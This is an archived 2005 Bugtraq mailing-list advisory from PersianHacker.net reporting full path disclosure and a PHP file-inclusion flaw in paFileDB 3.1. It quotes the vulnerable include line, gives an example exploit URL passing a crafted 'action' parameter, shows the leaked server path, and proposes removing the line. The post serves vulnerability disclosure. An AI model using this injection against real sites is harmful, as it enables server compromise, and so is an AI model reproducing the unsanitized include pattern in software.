Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[PersianHacker.net] Full Path Disclosure and PHP Injection In Pafiled

from [Pedram hayati] Network Security [Permanent Link]
Subject: [PersianHacker.net] Full Path Disclosure and PHP Injection In Pafiledb 3.1 Final
Date: 31 Jan 2005 07:01:30 -0000 


In the name of GOD

[Persianhacker.net] Full Path Disclosure and PHP Injection In Pafiledb 3.1 Final

PafileDB 
paFileDB is designed to allow webmasters have a database of files for download 
on their site. To add a download, all you do is upload the file using FTP or 
whatever method you use, log into paFileDB's admin center, and fill out a form 
to add a file. paFileDB lets you edit and delete the files too. No more messing 
with a bunch of HTML pages for a file database on your site! Using speedy MySQL 
for storing data, and powerful PHP for processing everything, paFileDB is one 
of the best and easiest ways to manage files!
More info @:
http://www.phparena.net/pafiledb.php


Discussion: 
--------------------
What is the bug ?
There is a Full Path Disclosure vulnerability in Pafiledb 3.1 which ends to 
disclosure of page local location on the web server.There is nother bug which 
let`s h4cK3r inject php codes and run them on server.

Where is the bug ?
At line 25 of pafiledb.php :

[
if ($login == "do") { include "./includes/$action/login.php"; exit; }
]

as we see $action is used in above statement and it`s not declared yet so 
h4ck3r can use it for PHP Injection attacks by passing his malicouse string 
from URL .


Exploit:
--------------------
[
http://www.example.com/pafiledb.php?login=do&action=[value]
]

which includes PHP codes in :

[
./includes/[value]/login.php
]

and if PHP page doesn`t realy exist at that address , server returns warring 
page like this :

[

Warning: main(./includes/value/login.php): failed to open stream: No such file 
or directory in /home/host/public_html/downloads/pafiledb.php on line 25

Warning: main(./includes/value/login.php): failed to open stream: No such file 
or directory in /home/host/public_html/downloads/pafiledb.php on line 25

Warning: main(): Failed opening './includes/value/login.php' for inclusion 
(include_path='.:/usr/lib/php:/usr/local/lib/php') in 
/home/host/public_html/downloads/pafiledb.php on line 25

]

and this message shows local address of pafiledb.php on server.


Solution:
--------------------
just remove line 25 of pafiledb.php ,there is no need for that line ( I wonder 
why coder ever used that ? ). 


Credit:
--------------------
Discovered by PersianHacker.NET Security Team 
by devil_box (d3vilbox  yahoo  com) 
http://www.PersianHacker.NET 

special thanks to : Pi3cH , Herbod , Amectris , IDEspinner and all guys in 
PersianHacker.net


Help
--------------------
Path Disclosure Article (Farsi Language):
http://www.persianhacker.net/articles/article-2208.html

More Help:
visit: http://www.PersianHacker.NET
or mail me @: d3vilbox  yahoo  com


Note
--------------------
Script authors not contacted.
PS : sorry for my bad english

good luck
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [PersianHacker.net] Full Path Disclosure and PHP Injection In Pafiledb 3.1 Final, Pedram hayati <=
Previous by Date:  Re: iDEFENSE Security Advisory 01.24.05: DataRescue Interactive Disassembler Pro Buffer Overflow Vulnerability, dila
Next by Date:  Zyxel / Netgear and probably other routers leaking information., Jens Kalvik
Previous by Thread:  [Full-Disclosure] [ GLSA 200501-46 ] ClamAV: Multiple issues, Sune Kloppenborg Jeppesen
Next by Thread:  Zyxel / Netgear and probably other routers leaking information., Jens Kalvik
Indexes:  [Date] [Thread] [Top] [All Lists]